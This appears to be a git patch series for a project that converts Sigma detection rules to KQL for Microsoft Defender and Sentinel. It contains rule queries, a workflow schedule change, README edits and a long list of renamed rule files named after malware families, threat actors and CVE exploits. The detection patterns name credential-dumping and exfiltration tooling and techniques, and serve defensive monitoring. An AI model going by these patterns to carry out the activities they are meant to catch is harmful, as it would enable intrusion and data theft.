Tags: attack.resource-development, attack.t1588.002 -// False Positives: -// - Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base) - -DeviceRegistryEvents +// Title: Suspicious Keyboard Layout Load +// Author: Florian Roth (Nextron Systems) +// Date: 2019-10-12 +// Level: medium +// Description: Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1588.002 +// False Positives: +// - Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base) + +DeviceRegistryEvents | where (RegistryValueData contains "00000429" or RegistryValueData contains "00050429" or RegistryValueData contains "0000042a") and (RegistryKey endswith "\\Keyboard Layout\\Preload*" or RegistryKey endswith "\\Keyboard Layout\\Substitutes*") \ No newline at end of file diff --git a/KQL/rules/Resource Development/uncommon_file_created_in_office_startup_folder.kql b/KQL/rules/Resource Development/uncommon_file_created_in_office_startup_folder.kql index bf26a7da..7e0c2a34 100644 --- a/KQL/rules/Resource Development/uncommon_file_created_in_office_startup_folder.kql +++ b/KQL/rules/Resource Development/uncommon_file_created_in_office_startup_folder.kql @@ -1,12 +1,12 @@ -// Title: Uncommon File Created In Office Startup Folder -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-05 -// Level: high -// Description: Detects the creation of a file with an uncommon extension in an Office application startup folder -// MITRE Tactic: Resource Development -// Tags: attack.resource-development, attack.t1587.001 -// False Positives: -// - False positive might stem from rare extensions used by other Office utilities. - -DeviceFileEvents +// Title: Uncommon File Created In Office Startup Folder +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-05 +// Level: high +// Description: Detects the creation of a file with an uncommon extension in an Office application startup folder +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587.001 +// False Positives: +// - False positive might stem from rare extensions used by other Office utilities. + +DeviceFileEvents | where (((FolderPath contains "\\Microsoft\\Word\\STARTUP" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\STARTUP")) and (not((FolderPath endswith ".docb" or FolderPath endswith ".docm" or FolderPath endswith ".docx" or FolderPath endswith ".dotm" or FolderPath endswith ".mdb" or FolderPath endswith ".mdw" or FolderPath endswith ".pdf" or FolderPath endswith ".wll" or FolderPath endswith ".wwl")))) or ((FolderPath contains "\\Microsoft\\Excel\\XLSTART" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\XLSTART")) and (not((FolderPath endswith ".xll" or FolderPath endswith ".xls" or FolderPath endswith ".xlsm" or FolderPath endswith ".xlsx" or FolderPath endswith ".xlt" or FolderPath endswith ".xltm" or FolderPath endswith ".xlw"))))) and (not((((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft Office\\") and (InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe")) or (InitiatingProcessFolderPath contains ":\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" and InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe")))) \ No newline at end of file diff --git a/KQL/rules/Resource Development/usage_of_renamed_sysinternals_tools_registryset.kql b/KQL/rules/Resource Development/usage_of_renamed_sysinternals_tools_registryset.kql index 8fb57420..978606fc 100644 --- a/KQL/rules/Resource Development/usage_of_renamed_sysinternals_tools_registryset.kql +++ b/KQL/rules/Resource Development/usage_of_renamed_sysinternals_tools_registryset.kql @@ -1,12 +1,12 @@ -// Title: Usage of Renamed Sysinternals Tools - RegistrySet -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-24 -// Level: high -// Description: Detects non-sysinternals tools setting the "accepteula" key which normally is set on sysinternals tool execution -// MITRE Tactic: Resource Development -// Tags: attack.resource-development, attack.t1588.002 -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Usage of Renamed Sysinternals Tools - RegistrySet +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-24 +// Level: high +// Description: Detects non-sysinternals tools setting the "accepteula" key which normally is set on sysinternals tool execution +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1588.002 +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where ((RegistryKey contains "\\PsExec" or RegistryKey contains "\\ProcDump" or RegistryKey contains "\\Handle" or RegistryKey contains "\\LiveKd" or RegistryKey contains "\\Process Explorer" or RegistryKey contains "\\PsLoglist" or RegistryKey contains "\\PsPasswd" or RegistryKey contains "\\Active Directory Explorer") and RegistryKey endswith "\\EulaAccepted") and (not((InitiatingProcessFolderPath endswith "\\PsExec.exe" or InitiatingProcessFolderPath endswith "\\PsExec64.exe" or InitiatingProcessFolderPath endswith "\\procdump.exe" or InitiatingProcessFolderPath endswith "\\procdump64.exe" or InitiatingProcessFolderPath endswith "\\handle.exe" or InitiatingProcessFolderPath endswith "\\handle64.exe" or InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livekd64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\psloglist.exe" or InitiatingProcessFolderPath endswith "\\psloglist64.exe" or InitiatingProcessFolderPath endswith "\\pspasswd.exe" or InitiatingProcessFolderPath endswith "\\pspasswd64.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer64.exe"))) and (not(isnull(InitiatingProcessFolderPath))) \ No newline at end of file diff --git a/KQL/rules/Resource Development/vhd_image_download_via_browser.kql b/KQL/rules/Resource Development/vhd_image_download_via_browser.kql index 6d0b5249..9281e3e4 100644 --- a/KQL/rules/Resource Development/vhd_image_download_via_browser.kql +++ b/KQL/rules/Resource Development/vhd_image_download_via_browser.kql @@ -1,13 +1,13 @@ -// Title: VHD Image Download Via Browser -// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' -// Date: 2021-10-25 -// Level: medium -// Description: Detects creation of ".vhd"/".vhdx" files by browser processes. -// Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls. -// MITRE Tactic: Resource Development -// Tags: attack.resource-development, attack.t1587.001 -// False Positives: -// - Legitimate downloads of ".vhd" files would also trigger this - -DeviceFileEvents +// Title: VHD Image Download Via Browser +// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' +// Date: 2021-10-25 +// Level: medium +// Description: Detects creation of ".vhd"/".vhdx" files by browser processes. +// Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls. +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587.001 +// False Positives: +// - Legitimate downloads of ".vhd" files would also trigger this + +DeviceFileEvents | where (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe") and FolderPath contains ".vhd" \ No newline at end of file diff --git a/sigma b/sigma new file mode 160000 index 00000000..c2f1eb41 --- /dev/null +++ b/sigma @@ -0,0 +1 @@ +Subproject commit c2f1eb41bc5c9f246339545e8fd5ee14ed7f8332 From 8f3f2eed588ae140a348b40e87b4abf28e895df7 Mon Sep 17 00:00:00 2001 From: Kaiber_wsl_desktop Date: Sun, 16 Nov 2025 15:29:58 +1100 Subject: [PATCH 08/17] adjusted cron schedule to run once a week on sunday at 2am UTC --- .github/workflows/update-sigma-rules.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/update-sigma-rules.yml b/.github/workflows/update-sigma-rules.yml index a5d02499..6061f485 100644 --- a/.github/workflows/update-sigma-rules.yml +++ b/.github/workflows/update-sigma-rules.yml @@ -2,8 +2,8 @@ name: Update Sigma to KQL Rules on: schedule: - # Run daily at 2 AM UTC - - cron: '0 2 * * *' + # Run weekly on Sunday at 2 AM UTC + - cron: '0 2 * * 0' workflow_dispatch: # Allow manual trigger From 4c2b9ca4be6b6bd780e75fe0bfdf925d3ee3d62d Mon Sep 17 00:00:00 2001 From: kaiberxc <89855993+Khadinxc@users.noreply.github.com> Date: Sun, 16 Nov 2025 16:40:52 +1100 Subject: [PATCH 09/17] Added badges to readme --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index ba769d7d..84fc725d 100644 --- a/README.md +++ b/README.md @@ -1,3 +1,4 @@ +![Update Sigma Rules](https://github.com/Khadinxc/Sigma2KQL/actions/workflows/update-sigma-rules.yml/badge.svg) # Sigma2KQL - Working as of 15/11/2025 Sigma Queries turned into KQL for Defender and Microsoft Sentinel using [pysigma-backend-KQL-backend](https://github.com/AttackIQ/pySigma-backend-kusto/tree/main) From 7f88737b8252cb2bb760f23f48462313bcd1ca34 Mon Sep 17 00:00:00 2001 From: Kaiber_wsl_desktop Date: Sun, 16 Nov 2025 16:41:52 +1100 Subject: [PATCH 10/17] another badge --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 84fc725d..28f49e3a 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,6 @@ ![Update Sigma Rules](https://github.com/Khadinxc/Sigma2KQL/actions/workflows/update-sigma-rules.yml/badge.svg) -# Sigma2KQL - Working as of 15/11/2025 +![GitHub last commit](https://img.shields.io/github/last-commit/Khadinxc/Sigma2KQL) +# Sigma2KQL - Automated Updates Sigma Queries turned into KQL for Defender and Microsoft Sentinel using [pysigma-backend-KQL-backend](https://github.com/AttackIQ/pySigma-backend-kusto/tree/main) __Disclaimer: Not all of these rules have been validated either to ensure KQL is functional or if they are an exact replica of the Sigma rule. The script was created with the assumption that the pySigma Kusto backend does what it is meant to do.__ From 9acd316b5dc0edd1cba0c444ce36e03850d528c4 Mon Sep 17 00:00:00 2001 From: kaiberxc <89855993+Khadinxc@users.noreply.github.com> Date: Fri, 28 Nov 2025 18:33:31 +1100 Subject: [PATCH 11/17] Updated helper script to sort into the same directory structure as the SIGMA rules repo making it easier to follow the pattern established there instead of searching in tactics folders. Updated readme too. --- .../TA/Axiom}/zxshell_malware.kql | 0 .../Turla}/turla_group_commands_may_2020.kql | 0 .../Turla}/turla_group_lateral_movement.kql | 0 .../exploit_for_cve_2015_1641.kql | 0 .../exploit_for_cve_2017_0261.kql | 0 .../droppers_exploiting_cve_2017_11882.kql | 0 .../exploit_for_cve_2017_8759.kql | 0 .../Malware/Adwind-RAT}/adwind_rat_jrat.kql | 0 .../Fireball}/fireball_archer_install.kql | 0 .../notpetya_ransomware_activity.kql | 0 .../PlugX}/potential_plugx_activity.kql | 0 .../wannacry_ransomware_activity.kql | 0 .../potential_apt10_cloud_hopper_activity.kql | 0 .../ps_exe_renamed_sysinternals_tool.kql | 0 .../lazarus_system_binary_masquerading.kql | 0 .../TA/Pandemic}/pandemic_registry_key.kql | 0 .../elise_backdoor_activity.kql | 0 .../APT27}/apt27_emissary_panda_activity.kql | 0 .../APT28}/sofacy_trojan_loader_activity.kql | 0 ...ishing_campaign_commandline_indicators.kql | 0 ...2018_phishing_campaign_file_indicators.kql | 0 .../oceanlotus_registry_activity.kql | 0 .../potential_muddywater_apt_activity.kql | 0 .../TA/OilRig}/oilrig_apt_activity.kql | 0 .../oilrig_apt_registry_persistence.kql | 0 .../TA/Slingshot}/defrag_deactivation.kql | 0 .../tropictrooper_campaign_november_2018.kql | 0 .../potential_bearlpe_exploitation.kql | 0 ...oiting_setupcomplete_cmd_cve_2019_1378.kql | 0 .../exploiting_cve_2019_1388.kql | 0 ...do_privilege_escalation_cve_2019_14287.kql | 0 .../potential_baby_shark_malware_activity.kql | 0 .../Dridex}/potential_dridex_activity.kql | 0 .../potential_dtrack_rat_activity.kql | 0 .../Emotet}/potential_emotet_activity.kql | 0 .../Formbook}/formbook_process_creation.kql | 0 .../lockergoga_ransomware_activity.kql | 0 .../Malware/QBot}/potential_qbot_activity.kql | 0 .../potential_ryuk_ransomware_activity.kql | 0 .../potential_snatch_ransomware_activity.kql | 0 ...ntial_ursnif_malware_activity_registry.kql | 0 ...ushroom_dll_load_activity_via_regsvr32.kql | 0 .../APT31}/apt31_judgement_panda_activity.kql | 0 ..._russian_apt_credential_theft_activity.kql | 0 .../potential_empiremonkey_activity.kql | 0 ...ation_group_dll_u_export_function_load.kql | 0 .../MustangPanda}/mustang_panda_dropper.kql | 0 .../operation_wocao_activity.kql | 0 ...oited_cve_2020_10189_zoho_manageengine.kql | 0 ..._suspicious_new_printer_ports_registry.kql | 0 ...s_printerports_creation_cve_2020_1048_.kql | 0 .../CVE-2020-1350}/dns_rce_cve_2020_1350.kql | 0 ...e_2020_1472_execution_of_zerologon_poc.kql | 0 .../Blue-Mockingbird}/blue_mockingbird.kql | 0 .../blue_mockingbird_registry.kql | 0 .../potential_emotet_rundll32_execution.kql | 0 .../FlowCloud}/flowcloud_registry_markers.kql | 0 ...ial_ke3chang_tidepool_malware_activity.kql | 0 .../potential_maze_ransomware_activity.kql | 0 .../Trickbot}/trickbot_malware_activity.kql | 0 ...lden_chickens_deployment_via_ocx_files.kql | 0 .../TA/GALLIUM}/gallium_iocs.kql | 0 .../greenbug_espionage_group_indicators.kql | 0 .../TA/Lazarus}/lazarus_group_activity.kql | 0 .../leviathan_registry_key_activity.kql | 0 .../suspicious_vbscript_un2452_pattern.kql | 0 .../unc2452_powershell_pattern.kql | 0 .../unc2452_process_creation_patterns.kql | 0 .../TA/TAIDOOR-RAT}/taidoor_rat_dll_load.kql | 0 .../winnti_malware_hk_university_campaign.kql | 0 .../winnti_pipemon_characteristics.kql | 0 ..._spooler_exploitation_filename_pattern.kql | 0 ...al_printnightmare_exploitation_attempt.kql | 0 .../printernightmare_mimikatz_driver_name.kql | 0 ...spooler_service_suspicious_binary_load.kql | 0 ...ce_cve_2021_26084_exploitation_attempt.kql | 0 ...al_cve_2021_26857_exploitation_attempt.kql | 0 .../cve_2021_26858_exchange_exploitation.kql | 0 ...cve_2021_31979_cve_2021_33771_exploits.kql | 0 ...979_cve_2021_33771_exploits_by_sourgum.kql | 0 ...xploitation_cve_2021_35211_by_dev_0322.kql | 0 ...al_cve_2021_40444_exploitation_attempt.kql | 0 ...tation_attempt_from_office_application.kql | 0 ...ous_word_cab_file_write_cve_2021_40444.kql | 0 ...r_lpe_cve_2021_41379_file_create_event.kql | 0 ...al_cve_2021_41379_exploitation_attempt.kql | 0 ...ve_2021_44077_poc_default_dropped_file.kql | 0 ...28_exploitation_attempt_vmware_horizon.kql | 0 ...ous_razerinstaller_explorer_subprocess.kql | 0 ...l_systemnightmare_exploitation_attempt.kql | 0 .../blackbyte_ransomware_registry.kql | 0 ...otential_blackbyte_ransomware_activity.kql | 0 .../conti_ntds_exfiltration_command.kql | 0 .../Conti}/conti_volume_shadow_listing.kql | 0 .../potential_conti_ransomware_activity.kql | 0 ...e_database_dumping_activity_via_sqlcmd.kql | 0 .../DarkSide}/darkside_ransomware_pattern.kql | 0 ...tial_devil_bait_malware_reconnaissance.kql | 0 ...potential_devil_bait_related_indicator.kql | 0 .../foggyweb_backdoor_dll_loading.kql | 0 .../goofy_guineapig_backdoor_ioc.kql | 0 ...tial_goofy_guineapig_backdoor_activity.kql | 0 ...guineapig_goolgeupdate_process_anomaly.kql | 0 .../moriya_rootkit_file_created.kql | 0 ...otential_netwire_rat_activity_registry.kql | 0 .../Pingback}/pingback_backdoor_activity.kql | 0 ...pingback_backdoor_dll_loading_activity.kql | 0 .../pingback_backdoor_file_indicators.kql | 0 ...ll_sieve_malware_commandline_indicator.kql | 0 ..._sieve_malware_file_indicator_creation.kql | 0 ...all_sieve_malware_registry_persistence.kql | 0 ...hafnium_exchange_exploitation_activity.kql | 0 ...revil_kaseya_incident_malware_patterns.kql | 0 .../apt_privatelog_image_load_pattern.kql | 0 .../TA/SOURGUM}/sourgum_actor_behaviours.kql | 0 ...ve_2023_21554_queuejumper_exploitation.kql | 0 ...space_one_access_remote_code_execution.kql | 0 ...22_24527_microsoft_connected_cache_lpe.kql | 0 .../atlassian_confluence_cve_2022_26134.kql | 0 ...al_cve_2022_26809_exploitation_attempt.kql | 0 ...al_cve_2022_29072_exploitation_attempt.kql | 0 ...ue_of_msdt_in_registry_cve_2022_30190_.kql | 0 ...hell_command_injection_processcreation.kql | 0 .../suspicious_sysmon_as_execution_parent.kql | 0 .../chromeloader_malware_execution.kql | 0 .../emotet_loader_execution_via_lnk_file.kql | 0 .../hermetic_wiper_tg_process_patterns.kql | 0 ...ential_raspberry_robin_dot_ending_file.kql | 0 ..._initial_execution_from_external_drive.kql | 0 ...robin_subsequent_execution_of_commands.kql | 0 ...r_payload_execution_via_scheduled_task.kql | 0 .../fakeupdates_socgholish_activity.kql | 0 ...otential_actinium_persistence_activity.kql | 0 .../TA/MERCURY}/mercury_apt_activity.kql | 0 ...icious_confluence_child_process_linux_.kql | 0 ...ious_confluence_child_process_windows_.kql | 0 .../outlook_task_note_reminder_received.kql | 0 ...on_hta_file_creation_by_foxitpdfreader.kql | 0 ...tation_dynamic_compilation_via_csc_exe.kql | 0 ..._exploitation_fake_wermgr_exe_creation.kql | 0 ...874_exploitation_fake_wermgr_execution.kql | 0 ...loitation_uncommon_report_wer_location.kql | 0 ...e_2023_36884_exploitation_dropped_file.kql | 0 ...tempt_suspicious_double_extension_file.kql | 0 ...ttempt_suspicious_winrar_child_process.kql | 0 ...tential_exploitation_rev_file_creation.kql | 0 ...empt_of_undocumented_windowsserver_rce.kql | 0 ...l_rat_anonymous_user_process_execution.kql | 0 ...oldsteel_rat_cleanup_command_execution.kql | 0 ...teel_rat_service_persistence_execution.kql | 0 ...steel_persistence_service_dll_creation.kql | 0 ...coldsteel_persistence_service_dll_load.kql | 0 ...otential_coldsteel_rat_file_indicators.kql | 0 ...al_coldsteel_rat_windows_user_creation.kql | 0 ...kgate_autoit3_exe_execution_parameters.kql | 0 ..._exe_file_creation_by_uncommon_process.kql | 0 .../darkgate_user_created_via_net_exe.kql | 0 .../griffon_malware_attack_pattern.kql | 0 ...ss_spawning_rundll32_guloader_activity.kql | 0 ...ingle_digit_dll_execution_via_rundll32.kql | 0 ...l_extension_execution_via_rundll32_exe.kql | 0 .../potential_pikabot_c2_activity.kql | 0 .../potential_pikabot_discovery_activity.kql | 0 .../potential_pikabot_hollowing_activity.kql | 0 ...cious_command_combinations_via_cmd_exe.kql | 0 .../potential_qakbot_rundll32_execution.kql | 0 .../Qakbot}/qakbot_regsvr32_calc_pattern.kql | 0 .../qakbot_rundll32_exports_execution.kql | 0 ..._rundll32_fake_dll_extension_execution.kql | 0 .../Qakbot}/qakbot_uninstaller_execution.kql | 0 ...stealer_module_launch_via_rundll32_exe.kql | 0 ...orschach_ransomware_execution_activity.kql | 0 ...registry_blob_related_to_snake_malware.kql | 0 ..._malware_installation_binary_indicator.kql | 0 ...e_installation_cli_arguments_indicator.kql | 0 ..._malware_persistence_service_execution.kql | 0 ...nake_malware_covert_store_registry_key.kql | 0 ...nake_malware_installer_name_indicators.kql | 0 ...e_malware_kernel_driver_file_indicator.kql | 0 ...are_werfault_persistence_file_creation.kql | 0 ...snif_redirection_of_discovery_commands.kql | 0 ..._dll_load_by_compromised_3cxdesktopapp.kql | 0 ...cxdesktopapp_beaconing_activity_netcon.kql | 0 ...al_compromised_3cxdesktopapp_execution.kql | 0 ...promised_3cxdesktopapp_update_activity.kql | 0 ...picious_child_process_of_3cxdesktopapp.kql | 0 ...ed_by_svr_for_graphicalproton_backdoor.kql | 0 ...d_sleet_apt_dll_sideloading_indicators.kql | 0 ...ond_sleet_apt_file_creation_indicators.kql | 0 ..._sleet_apt_process_activity_indicators.kql | 0 ...t_apt_scheduled_task_creation_registry.kql | 0 ...nnaissance_powertrash_related_activity.kql | 0 ...fin7_related_powershell_script_created.kql | 0 .../lace_tempest_cobalt_strike_download.kql | 0 .../lace_tempest_file_indicators.kql | 0 .../lace_tempest_malware_loader_execution.kql | 0 .../lazarus_apt_dll_sideloading_activity.kql | 0 ...erafaspex_suspicious_process_execution.kql | 0 ...storm_log4j_wstomcat_process_execution.kql | 0 ...ageengine_suspicious_process_execution.kql | 0 ..._panda_activity_against_australian_gov.kql | 0 ...nyx_sleet_apt_file_creation_indicators.kql | 0 ..._mf_ng_exploitation_related_indicators.kql | 0 .../papercut_mf_ng_potential_exploitation.kql | 0 ...dstorm_apt_process_activity_indicators.kql | 0 ..._barracuda_esg_exploitation_indicators.kql | 0 ...mpressed_files_from_temp_sh_using_wget.kql | 0 ...file_from_untrusted_direct_ip_via_wget.kql | 0 ...nc4841_email_exfiltration_file_pattern.kql | 0 .../unc4841_potential_seaspy_execution.kql | 0 ...l_certificate_exfiltration_via_openssl.kql | 0 ...eenconnect_path_traversal_exploitation.kql | 0 ...reenconnect_user_database_modification.kql | 0 ...2024_3094_suspicious_ssh_child_process.kql | 0 ...ect_os_command_injection_file_creation.kql | 0 ...l_cve_2024_35250_exploitation_activity.kql | 0 ...uspicious_creation_of_esx_admins_group.kql | 0 ...e_2024_50623_exploitation_attempt_cleo.kql | 0 ...eamer_rat_loading_net_executable_image.kql | 0 ...op_darkgate_loader_in_c_temp_directory.kql | 0 .../file_creation_related_to_rat_clients.kql | 0 ...kabot_activity_lure_document_execution.kql | 0 ...tivity_shutdown_schedule_task_creation.kql | 0 ...ot_activity_winlogon_shell_persistence.kql | 0 ...vity_execution_of_more_com_and_vbc_exe.kql | 0 ...raspberry_robin_cpl_execution_activity.kql | 0 ...registry_set_internet_settings_zonemap.kql | 0 .../kapeka_backdoor_autorun_persistence.kql | 0 ...eka_backdoor_configuration_persistence.kql | 0 ...ka_backdoor_execution_via_rundll32_exe.kql | 0 ...apeka_backdoor_loaded_via_rundll32_exe.kql | 0 .../kapeka_backdoor_persistence_activity.kql | 0 ...al_kapeka_decrypted_backdoor_indicator.kql | 0 ...tential_apt_fin7_exploitation_activity.kql | 0 ...d_apt_custom_protocol_handler_creation.kql | 0 ...stom_protocol_handler_dll_registry_set.kql | 0 ...st_blizzard_apt_file_creation_activity.kql | 0 ...t_javascript_constrained_file_creation.kql | 0 ...blizzard_apt_process_creation_activity.kql | 0 ...t_slashandgrab_exploitation_indicators.kql | 0 ...tation_of_goanywhere_mft_vulnerability.kql | 0 ..._file_potential_cve_2025_24054_exploit.kql | 0 ..._spawned_by_centrestack_portal_apppool.kql | 0 .../suspicious_crushftp_child_process.kql | 0 ...ential_sap_netweaver_webshell_creation.kql | 0 ..._sap_netweaver_webshell_creation_linux.kql | 0 ..._potential_cve_2025_32463_exploitation.kql | 0 ...ulnerability_cve_2025_33053_image_load.kql | 0 ...al_notepad_cve_2025_49144_exploitation.kql | 0 ...ve_2025_53770_exploitation_file_create.kql | 0 ...cve_2025_53770_exploitation_indicators.kql | 0 ...hftp_rce_vulnerability_cve_2025_54309_.kql | 0 ...user_and_guid_password_cve_2025_57788_.kql | 0 ...raversal_webshell_drop_cve_2025_57790_.kql | 0 ..._authentication_bypass_cve_2025_57791_.kql | 0 ...25_59287_wsus_suspicious_child_process.kql | 0 ...mic_macos_stealer_filegrabber_activity.kql | 10 +++++++++ ...c_macos_stealer_persistence_indicators.kql | 10 +++++++++ ...grixba_malware_reconnaissance_activity.kql | 13 +++++++++++ .../Katz-Stealer}/katz_stealer_dll_loaded.kql | 0 ...lud_malicious_github_workflow_creation.kql | 0 ...ackage_malicious_exfiltration_via_curl.kql | 0 .../funklocker_ransomware_file_creation.kql | 0 ...ackdoor_curl_tor_socks_proxy_execution.kql | 0 .../macos_filegrabber_infostealer.kql | 10 --------- ...suspicious_long_filename_pattern_linux.kql | 14 ++++++++++++ ...path_configuration_file_creation_linux.kql | 0 .../process_creation}/process_discovery.kql | 0 .../terminate_linux_process_via_kill.kql | 0 ...path_configuration_file_creation_macos.kql | 0 .../clipboard_data_collection_via_pbpaste.kql | 0 ...dential_files_by_uncommon_applications.kql | 0 ...nsitive_files_by_uncommon_applications.kql | 0 ...eg_hive_files_by_uncommon_applications.kql | 0 ...vol_policies_share_by_uncommon_process.kql | 0 ...ok_mail_files_by_uncommon_applications.kql | 0 .../unattend_xml_file_access_attempt.kql | 0 .../ads_zone_identifier_deleted.kql | 0 ...tion_of_an_executable_by_an_executable.kql | 0 .../file_event}/dmp_hdmp_file_creation.kql | 0 .../file/file_event}/pfx_file_creation.kql | 0 ...th_configuration_file_creation_windows.kql | 0 .../scheduled_task_created_filecreation.kql | 0 ...e_code_tunnel_execution_file_indicator.kql | 0 ..._file_creation_in_codeintegrity_folder.kql | 0 .../webdav_temporary_local_file_creation.kql | 0 .../amsi_dll_load_by_uncommon_process.kql | 0 ...tsproxy_dll_loaded_by_uncommon_process.kql | 0 ..._loaded_by_uncommon_suspicious_process.kql | 0 .../microsoft_excel_add_in_loaded.kql | 0 .../microsoft_word_add_in_loaded.kql | 0 .../image_load}/system_drawing_dll_load.kql | 0 ...ted_in_potentially_suspicious_location.kql | 0 .../wmi_module_loaded_by_uncommon_process.kql | 0 ...xe_network_connection_to_non_local_ips.kql | 0 ...ork_connection_to_non_local_ip_address.kql | 0 ..._exe_initiated_http_network_connection.kql | 0 ...initiated_network_connection_over_http.kql | 0 ...ection_initiated_by_powershell_process.kql | 0 ...ion_initiated_from_users_public_folder.kql | 0 ...suspicious_azure_front_door_connection.kql | 0 .../arbitrary_command_execution_using_wsl.kql | 0 .../cab_file_extraction_via_wusa_exe.kql | 0 ...ment_execution_dfsvc_exe_child_process.kql | 0 .../cmd_shell_output_redirect.kql | 0 .../codepage_modification_via_mode_com.kql | 0 .../process_creation}/curl_exe_execution.kql | 0 ...rl_exe_execution_with_custom_useragent.kql | 0 .../diskshadow_child_process_spawned.kql | 0 .../diskshadow_script_mode_execution.kql | 0 .../dll_call_by_ordinal_via_rundll32_exe.kql | 0 ...ic_net_compilation_via_csc_exe_hunting.kql | 0 .../elevated_system_shell_spawned.kql | 0 ...og_query_requests_by_builtin_utilities.kql | 0 .../execution_from_webserver_root_folder.kql | 0 .../file_download_via_curl_exe.kql | 0 ...le_or_folder_permissions_modifications.kql | 0 ...connection_open_attempt_via_winscp_cli.kql | 0 ...dless_process_launched_via_conhost_exe.kql | 0 ..._new_module_via_powershell_commandline.kql | 0 ..._the_cryptography_powershell_namespace.kql | 0 ..._of_script_inside_of_a_compressed_file.kql | 0 .../microsoft_workflow_compiler_execution.kql | 0 .../process_creation}/net_exe_execution.kql | 0 ...cting_package_created_via_iexpress_exe.kql | 0 ...e_added_via_new_netfirewallrule_cmdlet.kql | 0 ...ed_compressed_file_extraction_via_7zip.kql | 0 ...tware_execution_uc_berkeley_signature_.kql | 0 ...e_obfuscation_using_unicode_characters.kql | 0 ...tential_data_exfiltration_via_curl_exe.kql | 0 ...sideloading_activity_via_extexport_exe.kql | 0 ...l_file_override_append_via_set_command.kql | 0 ...assword_reconnaissance_via_findstr_exe.kql | 0 ...on_via_explorer_exe_from_shell_process.kql | 0 ..._execution_from_guid_like_folder_names.kql | 0 ...suspicious_compression_tool_parameters.kql | 0 ..._suspicious_powershell_child_processes.kql | 0 .../process_execution_from_webdav_share.kql | 0 .../process_terminated_via_taskkill.kql | 0 ...ary_code_execution_and_remote_sessions.kql | 0 ...access_tool_ammy_admin_agent_execution.kql | 0 ...s_tool_cmd_exe_execution_via_anyviewer.kql | 0 ...nnect_remote_command_execution_hunting.kql | 0 ...isterserver_export_function_explicitly.kql | 0 .../sc_exe_query_execution.kql | 0 ...m_potential_suspicious_parent_location.kql | 0 ...files_as_system_files_using_attrib_exe.kql | 0 .../smb_over_quic_via_net_exe.kql | 0 ...s_new_instance_of_an_office_com_object.kql | 0 .../suspicious_tasklist_discovery_command.kql | 0 ...tem_information_discovery_via_wmic_exe.kql | 0 .../tunneling_tool_execution.kql | 0 .../unusually_long_powershell_commandline.kql | 0 .../use_short_name_path_in_command_line.kql | 0 ...scp_execution_from_non_standard_folder.kql | 0 ...vbe_file_execution_via_cscript_wscript.kql | 0 .../scheduled_task_created_registry.kql | 0 ...d_executed_via_run_dialog_box_registry.kql | 0 ...rosoft_office_trusted_location_updated.kql | 0 ..._the_cryptography_powershell_namespace.kql | 0 ...rvice_binary_in_user_controlled_folder.kql | 0 .../shell_context_menu_command_tampering.kql | 0 ...ad_from_browser_process_via_inline_url.kql | 10 --------- .../rdp_sensitive_settings_changed.kql | 13 ----------- ..._via_werfaultsecure_through_edr_freeze.kql | 12 ---------- .../pua_adfind_suspicious_execution.kql | 12 ---------- ...edpaths_from_browser_file_upload_abuse.kql | 10 --------- ...process_from_browser_file_upload_abuse.kql | 14 ------------ .../fsutil_behavior_set_symlinkevaluation.kql | 13 ----------- ...stence_via_new_amsi_providers_registry.kql | 12 ---------- ...of_renamed_sysinternals_tools_registry.kql | 12 ---------- .../linux_doas_conf_file_creation.kql | 0 .../persistence_via_cron_files.kql | 0 .../persistence_via_sudoers_files.kql | 0 ...hell_script_creation_in_profile_folder.kql | 0 ...filename_with_embedded_base64_commands.kql | 13 +++++++++++ ...le_cross_ebpf_rootkit_default_lockfile.kql | 0 ...cross_ebpf_rootkit_default_persistence.kql 